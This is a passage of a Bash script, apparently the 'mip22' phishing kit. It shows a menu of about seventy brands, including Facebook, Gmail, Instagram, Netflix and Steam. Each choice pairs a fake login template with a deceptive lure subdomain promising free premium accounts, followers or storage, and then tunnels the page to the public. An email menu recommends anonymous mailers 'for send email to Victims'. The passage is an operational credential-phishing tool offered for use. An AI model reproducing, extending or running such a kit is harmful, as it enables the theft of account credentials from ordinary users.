- ${GREEN}[${WHITE}6${GREEN}]${CYAN} Clashofclans ${GREEN}[${WHITE}30${GREEN}]${CYAN} Microsoft ${GREEN}[${WHITE}54${GREEN}]${CYAN} Tiktok
- ${GREEN}[${WHITE}7${GREEN}]${CYAN} Crunchyroll ${GREEN}[${WHITE}31${GREEN}]${CYAN} Mocospace ${GREEN}[${WHITE}55${GREEN}]${CYAN} Tiktok Followers
- ${GREEN}[${WHITE}8${GREEN}]${CYAN} Deviantart ${GREEN}[${WHITE}32${GREEN}]${CYAN} Myspace ${GREEN}[${WHITE}56${GREEN}]${CYAN} Tumblr
- ${GREEN}[${WHITE}9${GREEN}]${CYAN} Discord ${GREEN}[${WHITE}33${GREEN}]${CYAN} Netflix ${GREEN}[${WHITE}57${GREEN}]${CYAN} Twitch
- ${GREEN}[${WHITE}10${GREEN}]${CYAN} Dota2 ${GREEN}[${WHITE}34${GREEN}]${CYAN} Origin ${GREEN}[${WHITE}58${GREEN}]${CYAN} Twitter
- ${GREEN}[${WHITE}11${GREEN}]${CYAN} Dropbox ${GREEN}[${WHITE}35${GREEN}]${CYAN} Outlook ${GREEN}[${WHITE}59${GREEN}]${CYAN} Viber Out
- ${GREEN}[${WHITE}12${GREEN}]${CYAN} Ebay ${GREEN}[${WHITE}36${GREEN}]${CYAN} Pinterest ${GREEN}[${WHITE}60${GREEN}]${CYAN} Vimeo
- ${GREEN}[${WHITE}13${GREEN}]${CYAN} Facebook ${GREEN}[${WHITE}37${GREEN}]${CYAN} Playstation ${GREEN}[${WHITE}61${GREEN}]${CYAN} Vk
- ${GREEN}[${WHITE}14${GREEN}]${CYAN} Facebook Messenger ${GREEN}[${WHITE}38${GREEN}]${CYAN} Protonmail ${GREEN}[${WHITE}62${GREEN}]${CYAN} Whatsapp
- ${GREEN}[${WHITE}15${GREEN}]${CYAN} Facebook Security ${GREEN}[${WHITE}49${GREEN}]${CYAN} Pubg ${GREEN}[${WHITE}63${GREEN}]${CYAN} Wordpress
- ${GREEN}[${WHITE}16${GREEN}]${CYAN} Gmail ${GREEN}[${WHITE}40${GREEN}]${CYAN} Quora ${GREEN}[${WHITE}64${GREEN}]${CYAN} Xanga
- ${GREEN}[${WHITE}17${GREEN}]${CYAN} Goodreads ${GREEN}[${WHITE}41${GREEN}]${CYAN} Reverly ${GREEN}[${WHITE}65${GREEN}]${CYAN} Xbox
- ${GREEN}[${WHITE}18${GREEN}]${CYAN} Hotstar ${GREEN}[${WHITE}42${GREEN}]${CYAN} Reddit ${GREEN}[${WHITE}66${GREEN}]${CYAN} Xing
- ${GREEN}[${WHITE}19${GREEN}]${CYAN} Icloud ${GREEN}[${WHITE}43${GREEN}]${CYAN} Reverbnation ${GREEN}[${WHITE}67${GREEN}]${CYAN} Yahoo
- ${GREEN}[${WHITE}20${GREEN}]${CYAN} Influenster ${GREEN}[${WHITE}44${GREEN}]${CYAN} Signal ${GREEN}[${WHITE}68${GREEN}]${CYAN} Yandex
- ${GREEN}[${WHITE}21${GREEN}]${CYAN} Instagram ${GREEN}[${WHITE}45${GREEN}]${CYAN} Skype ${GREEN}[${WHITE}69${GREEN}]${CYAN} Youtube SUbs
- ${GREEN}[${WHITE}22${GREEN}]${CYAN} Insta Followers ${GREEN}[${WHITE}46${GREEN}]${CYAN} Skyrock ${GREEN}[${WHITE}02${GREEN}]${CYAN} Others
- ${GREEN}[${WHITE}23${GREEN}]${CYAN} Insta Followers 2 ${GREEN}[${WHITE}47${GREEN}]${CYAN} Snapchat ${GREEN}[${WHITE}99${GREEN}]${MAGENTA} Main Menu
- ${GREEN}[${WHITE}24${GREEN}]${CYAN} Instagram Verify ${GREEN}[${WHITE}48${GREEN}]${CYAN} Socialclub
-
-
- EOF
-
-
- read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
- case $REPLY in
-
- 1)
- site="adobe"
- subdomain='http://adobe-pro-membership-lifetime-for-you'
- tunnel;;
-
-
- 2)
- site="amazon"
- subdomain='http://amazon-pro-membership-lifetime-for-you'
- tunnel;;
-
-
- 3)
- site="apple"
- subdomain='http://apple-security-account-login'
- tunnel;;
-
-
- 4)
- site="badoo"
- subdomain='http://get-2000-euro-free-for-your-acount'
- tunnel;;
-
-
- 5)
- site="care2"
- subdomain='http://get-2000-tokens-free-for-your-acount'
- tunnel;;
-
-
- 6)
- site="clashofclans"
- subdomain='http://get-free-character-for-clashofclans-game'
- tunnel;;
-
-
- 7)
- site="crunchyroll"
- subdomain='http://get-free-character-for-crunchyroll-game'
- tunnel;;
-
-
- 8)
- site="deviantart"
- subdomain='http://deviantart-upgrade-account-pro-for-free'
- tunnel;;
-
-
- 9)
- site="discord"
- subdomain='http://discord-upgrade-account-pro-for-free'
- tunnel;;
-
-
- 10)
- site="dota2"
- subdomain='http://dota-upgrade-account-pro-for-free'
- tunnel;;
-
-
- 11)
- site="dropbox"
- subdomain='http://get-2TB-cloud-storage-free'
- tunnel;;
- 12)
- site="ebay"
- subdomain='http://ebay-upgrade-account-for-free'
- tunnel;;
- 13)
- site="facebook"
- subdomain='http://secure-verified-account-for-facebook'
- tunnel;;
-
-
- 14)
- site="facebook_messenger"
- subdomain='http://messenger-premium-features-for-free'
- tunnel;;
-
-
- 15)
- site="facebook_security"
- subdomain='http://make-your-facebook-secured-from-hackers'
- tunnel;;
-
- 16)
- site="gmail"
- subdomain='http://get-unlimited-google-drive-free'
- tunnel;;
-
-
- 17)
- site="goodreads"
- subdomain='http://goodreads-updrade-account-lifetime-free'
- tunnel;;
-
-
- 18)
- site="hotstar"
- subdomain='http://hotstar-premieum-account-for-free'
- tunnel;;
-
-
- 19)
- site="icloud"
- subdomain='http://get-2TB-cloud-storage-free'
- tunnel;;
-
-
- 20)
- site="influenster"
- subdomain='http://update-account-to-premium-free'
- tunnel;;
-
-
- 21)
- site="instagram"
- subdomain='http://secure-login-for-instagram'
- tunnel;;
-
-
- 22)
- site="instagram_followers"
- subdomain='http://get-10000-followers-for-instagram'
- tunnel;;
-
-
- 23)
- site="instagram_followers_2"
- subdomain='http://get-10000-followers-for-instagram'
- tunnel;;
-
-
- 24)
- site="instagram_verify"
- subdomain='http://instagram-verify-account'
- tunnel;;
-
-
- 25)
- site="line"
- subdomain='http://line-get-free-tokens-for-speech'
- tunnel;;
-
-
- 26)
- site="linkedin"
- subdomain='http://get-a-premium-plan-for-linkedin-free'
- tunnel;;
-
-
- 27)
- site="livejournal"
- subdomain='http://get-a-premium-plan-for-livejournal-free'
- tunnel;;
-
-
- 28)
- site="mediafire"
- subdomain='http://get-2TB-cloud-storage-free'
- tunnel;;
-
-
- 29)
- site="mewe"
- subdomain='http://mewe-update-account-to-premium-free'
- tunnel;;
-
-
- 30)
- site="microsoft"
- subdomain='http://unlimited-onedrive-space-for-free'
- tunnel;;
-
- 31)
- site="mocospace"
- subdomain='http://upgrade-your-mocospace-plan-free'
- tunnel;;
-
-
- 32)
- site="myspace"
- subdomain='http://upgrade-your-myspace-plan-free'
- tunnel;;
-
-
- 33)
- site="netflix"
- subdomain='http://upgrade-your-netflix-plan-free'
- tunnel;;
-
- 34)
- site="origin"
- subdomain='http://origin-upgrade-to-premium-account-free'
- tunnel;;
-
-
- 35)
- site="outlook"
- subdomain='http://unlimited-onedrive-space-for-free'
- tunnel;;
-
- 36)
- site="pinterest"
- subdomain='http://get-a-premium-plan-for-pinterest-free'
- tunnel;;
-
-
- 37)
- site="playstation"
- subdomain='http://playstation-premium-account-free'
- tunnel;;
-
-
- 38)
- site="protonmail"
- subdomain='http://protonmail-pro-basics-for-free'
- tunnel;;
-
-
- 39)
- site="pubg"
- subdomain='http://get-free-character-for-pubs-game'
- tunnel;;
-
-
- 40)
- site="quora"
- subdomain='http://get-quora-premium-account-for-free-lifetime'
- tunnel;;
-
-
- 41)
- site="raverly"
- subdomain='http://get-raverly-premium-account-for-free-'
- tunnel;;
-
-
- 42)
- site="reddit"
- subdomain='http://reddit-official-verified-member-badge'
- tunnel;;
-
-
- 43)
- site="reverbnation"
- subdomain='http://get-reverbnation-premium-account-for-free-'
- tunnel;;
-
-
- 44)
- site="signal"
- subdomain='http://signal-get-free-tokens-for-speech'
- tunnel;;
-
-
- 45)
- site="skype"
- subdomain='http://skype-get-free-tokens-for-speech'
- tunnel;;
-
-
- 46)
- site="skyrock"
- subdomain='http://skyrock-upgrade-to-premium-account-free'
- tunnel;;
-
-
- 47)
- site="snapchat"
- subdomain='http://view-locked-snapchat-accounts-secretly'
- tunnel;;
-
- 48)
- site="socialclub"
- subdomain='http://-socialclub-update-account-to-premieum-free'
- tunnel;;
-
-
- 49)
- site="spotify"
- subdomain='http://convert-your-account-to-spotify-premium'
- tunnel;;
-
-
- 50)
- site="stackoverflow"
- subdomain='http://stackoverflow-convert-your-account-to-premium'
- tunnel;;
-
-
- 51)
- site="steam"
- subdomain='http://steam-convert-your-account-to-premium'
- tunnel;;
-
- 52)
- site="tagget"
- subdomain='http://tagget-convert-your-account-to-premium'
- tunnel;;
-
-
- 53)
- site="telegram"
- subdomain='http://telegram-get-free-tokens-for-speech'
- tunnel;;
-
-
- 54)
- site="tiktok"
- subdomain='http://get-tiktok-100000-followers-free-at-instant'
- tunnel;;
-
-
- 55)
- site="tiktok_followers"
- subdomain='http://get-tiktok-100000-followers-free-at-instant'
- tunnel;;
-
-
- 56)
- site="tumblr"
- subdomain='http://tumblr-upgrade-account-to-premium-free'
- tunnel;;
-
-
- 57)
- site="twitch"
- subdomain='http://unlimited-twitch-tv-user-for-free'
- tunnel;;
-
-
- 58)
- site="twitter"
- subdomain='http://get-blue-badge-on-twitter-free'
- tunnel;;
-
-
- 59)
- site="viber_out"
- subdomain='http://viber-get-free-tokens-for-speech'
- tunnel;;
-
-
- 60)
- site="vimeo"
- subdomain='http://get-100000-views-for-channel-free'
- tunnel;;
-
-
-
- 61)
- site="vk"
- subdomain='http://vk-premium-real-method-2022-free'
- tunnel;;
-
-
- 62)
- site="whatsapp"
- subdomain='http://get-3000-free-tokens-for-free'
- tunnel;;
-
-
- 63)
- site="wordpress"
- subdomain='http://get-unlimited-wordpress-traffic-free'
- tunnel;;
-
-
- 64)
- site="xanga"
- subdomain='http://xanga-update-account-to-premieum'
- tunnel;;
-
-
- 65)
- site="xbox"
- subdomain='http://xbox-premium-account-new-method-2022'
- tunnel;;
-
-
- 66)
- site="xing"
- subdomain='http://xing-update-account-to-premieum'
- tunnel;;
-
-
-
- 67)
- site="yahoo"
- subdomain='http://grab-mail-from-anyother-yahoo-account-free'
- tunnel;;
-
- 68)
- site="yandex"
- subdomain='http://grab-mail-from-anyother-yandex-account-free'
- tunnel;;
-
-
- 69)
- site="youtube_subs"
- subdomain='http://get-100000-youtube-subscribers-free'
- tunnel;;
-
-
- 02)
- other_sites;;
-
-
- 99) menu;;
-
-
- *)
- echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
- { sleep 0.7; attack;};;
-
- esac
- }
- other_sites() {
-
- { clear; header; echo; }
- cat <<- EOF
- ${GREEN}[${WHITE}1${GREEN}]${CYAN} Freefire
- ${GREEN}[${WHITE}2${GREEN}]${CYAN} Roblox
- ${GREEN}[${WHITE}99${GREEN}]${MAGENTA} Main Menu
-
-
-
- EOF
-
-
- read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
- case $REPLY in
-
- 1)
- site="freefire"
- subdomain='http://get-free-character-for-freefire-game'
- tunnel;;
-
-
- 2)
- site="roblox"
- subdomain='http://get-free-character-for-roblox-game'
- tunnel;;
-
-
-
- 99) menu;;
-
-
- *)
- echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
- { sleep 0.7; other_sites;};;
-
- esac
- }
- attack_manual() {
- subdomain='http:secure-login-page'
- tunnel_manual
-
- }
- email() {
- { clear; header; echo; }
- echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Use this services for send email to Victims \n"
-
- echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${CYAN} https://www.guerrillamail.com/ \n"
- echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${CYAN} https://emkei.cz/ ${MAGENTA} (recommended) \n"
- echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${CYAN} https://mailspre.com/ \n"
- echo -ne "\n\n"
-
-
- cat <<- EOF
- ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
-
-
- EOF
-
- read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
- case $REPLY in
-
- 99) menu;;
-
- *)
- echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
- { sleep 0.7; email;};;
-
- esac
-
- }
- menu() {
-
- { clear; header; echo; }
- cat <<- EOF
- ${GREEN}[${WHITE}1${GREEN}]${CYAN} Attack Default
- ${GREEN}[${WHITE}2${GREEN}]${CYAN} Attack Manual
- ${GREEN}[${WHITE}3${GREEN}]${CYAN} Apis
- ${GREEN}[${WHITE}4${GREEN}]${CYAN} Email
- ${GREEN}[${WHITE}5${GREEN}]${CYAN} Vpn
- ${GREEN}[${WHITE}6${GREEN}]${CYAN} Sound (pc only)
- ${GREEN}[${WHITE}0${GREEN}]${ORANGE} Exit
-
-
- EOF
-
- read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select an option : ${WHITE}"${WHITE}
- case $REPLY in
-
- 1) attack;;
-
- 2) attack_manual;;
-
- 3) apis;;
-
- 4) email;;
-
- 5) vpn_setup;;
-
- 6) play_music;;
-
- help) help;;
-
- 0)
- echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${ORANGE} Thanks for using mip22 "${WHITE}
- sleep 2
- clear
- exit 1;;
-
- *)
- echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
- { sleep 0.7; menu;};;
-
- esac
-
- }
- control_c()
- {
- echo -e "${RESETBG}"
- echo -e "${RESETFG}"
- clear
- exit 1
- }
- trap control_c SIGINT
- check_os_and_install_packages
- check_root_and_os
- pid_kill
- menu
|